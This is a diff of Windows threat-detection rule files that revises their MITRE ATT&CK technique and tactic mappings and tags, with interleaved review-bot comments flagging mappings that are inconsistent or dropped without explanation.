@@ -101,14 +101,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -163,39 +156,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml index f876139f3e3..938cd397a2b 100644 
--- a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,14 +82,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
@@ -144,39 +137,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml index c8686112bee..251ddd0e74c 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
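Review bot: This threat hunk keeps `T1140` "Deobfuscate/Decode Files or Information" next to the newly added `T1027.010`, whereas the sibling posh_obfuscation rules changed in this commit (iex_env_vars_reconstruction, iex_string_reconstruction, reverse_keyword, string_concat, string_format, whitespace_special_proportion) all remove T1140 in the same edit. If dropping T1140 is the intended normalization for this rule family, index_reversal looks like it was missed; if index reversal is deliberately treated as both obfuscation and runtime decoding, that rationale belongs in the PR description so the next pass over these mappings does not "fix" it. Either outcome is fine, but the family should agree.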
@@ -100,14 +100,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -153,39 +146,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml index ef57939e469..1886459dd34 100644 
--- a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,14 +98,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
@@ -152,39 +145,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml index c92ccaac12b..95a1b579929 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -100,14 +100,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -174,39 +167,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml index eea41de377c..451282d8be6 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -167,39 +167,21 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index 26f4689951f..eb10b5a9081 100644 
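Review bot: The threat hunk for whitespace_special_proportion deletes the whole Execution entry (`TA0002` with `T1059.001` PowerShell), while the six sibling posh_obfuscation rules in this commit resolve the same tag/threat mismatch the other way, by keeping T1059.001 and adding `"Tactic: Execution"` to `tags`. All seven rules read the same PowerShell script-block source, so the Execution mapping is either appropriate for all of them or for none, and the divergence looks accidental. The `tags` array for this file is not in the diff, so I cannot tell whether it previously carried the Execution tag; the same blind spot applies to reg_disable_enableglobalqueryblocklist and right_to_left_override, whose removed tactic entries also have no visible tags hunk, and the `_mitre_tactic_tag_gaps` helper added in this commit would report any leftover tactic tag in those files as an orphan. If the Execution mapping is meant to stay, the fix here is the one-line tags addition `"Tactic: Execution",` rather than removing the threat block.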
--- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -139,49 +139,34 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.001" -name = "Dynamic-link Library Injection" -reference = "https://attack.mitre.org/techniques/T1055/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1055.002" -name = "Portable Executable Injection" -reference = "https://attack.mitre.org/techniques/T1055/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml index 772ec9c6030..e8dd124e358 100644 --- a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml +++ b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml 
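Review bot: The threat hunk drops `T1106` Native API and both `T1055` sub-techniques (`T1055.001`, `T1055.002`) from the PowerShell process-injection rule without any query change visible in the diff. If the query still matches on the API function names used for injection, which the rule name suggests but the query itself is outside this hunk, then the Native API mapping was accurate and any coverage view derived from `rule.threat` silently loses it. A sentence in the PR description on why the sub-techniques were judged too specific, or a matching edit to the rule's `description`, would make this an intentional narrowing rather than an unexplained coverage reduction.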
@@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -74,21 +74,7 @@ references = [ risk_score = 47 rule_id = "f63c8e3c-d396-404f-b2ea-0379d3942d73" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -106,36 +92,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml index d3516cd5119..3601255196c 100644 --- a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml +++ b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -94,31 +94,23 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml index 7aba4b1f611..38470bfed72 100644 --- a/rules/windows/defense_evasion_regmod_remotemonologue.toml +++ b/rules/windows/defense_evasion_regmod_remotemonologue.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
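Review bot: This hunk removes the Credential Access entry (`TA0006` / `T1557` Adversary-in-the-Middle) from reg_disable_enableglobalqueryblocklist and adds `T1112` Modify Registry under Defense Evasion. As I understand the setting, the global query block list exists to stop WPAD and ISATAP names from being registered, so clearing it is the precursor to an adversary-in-the-middle position rather than an evasion in its own right; the removed T1557 mapping captured that "why", and T1112 alone describes only the observable. If the mapping is being narrowed because the rule observes only the registry change, that reasoning should be stated in the PR description, and the rule `description` should still mention the spoofing consequence so analysts triaging the alert know what the change enables.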
@@ -54,18 +54,7 @@ references = [ risk_score = 47 rule_id = "c18975f5-676c-4091-b626-81e8938aa2ee" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -118,19 +107,36 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/defense_evasion_right_to_left_override.toml b/rules/windows/defense_evasion_right_to_left_override.toml index 2b351c4f41b..b51b6537de2 100644 --- a/rules/windows/defense_evasion_right_to_left_override.toml +++ b/rules/windows/defense_evasion_right_to_left_override.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
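Review bot: This hunk remaps regmod_remotemonologue from Defense Evasion (`T1112`, `T1562`) to Persistence and Privilege Escalation via `T1546.015` Component Object Model Hijacking, and the tags hunk drops `"Tactic: Defense Evasion"` entirely, yet the file keeps its `defense_evasion_` prefix. If the repository's naming convention ties the prefix to the rule's first tactic, the file should be renamed in the same change; the same applies to scheduledjobs_at_protocol_enabled, which now maps only to Persistence. On the mapping itself, the published RemoteMonologue technique as I recall it alters DCOM `RunAs` registry values to make a server-side object run as the logged-on user and coerce authentication, which reads closer to credential access or lateral movement than to hijacking a COM object for persistence, so T1546.015 may be a loose fit; a line in the PR description explaining the choice would help. The query is outside this hunk, so I cannot confirm which registry values the rule actually watches.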
@@ -87,36 +87,18 @@ any where host.os.type == "windows" and event.category in ("file", "process") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.002" name = "Right-to-Left Override" reference = "https://attack.mitre.org/techniques/T1036/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_sc_sdset.toml b/rules/windows/defense_evasion_sc_sdset.toml index e543bd70b60..1bd4d0e93cb 100644 --- a/rules/windows/defense_evasion_sc_sdset.toml +++ b/rules/windows/defense_evasion_sc_sdset.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/16" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -65,19 +65,7 @@ references = [ risk_score = 47 rule_id = "5188c68e-d3de-4e96-994d-9e242269446f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -91,31 +79,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml index baa9ab7adee..e89f301a889 100644 --- a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml 
+++ b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32 risk_score = 47 rule_id = "9aa0e1f6-52ce-42e1-abb3-09657cee2698" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -88,36 +75,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" - +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml index 4436cce7568..fdb46fca621 100644 --- a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml +++ b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
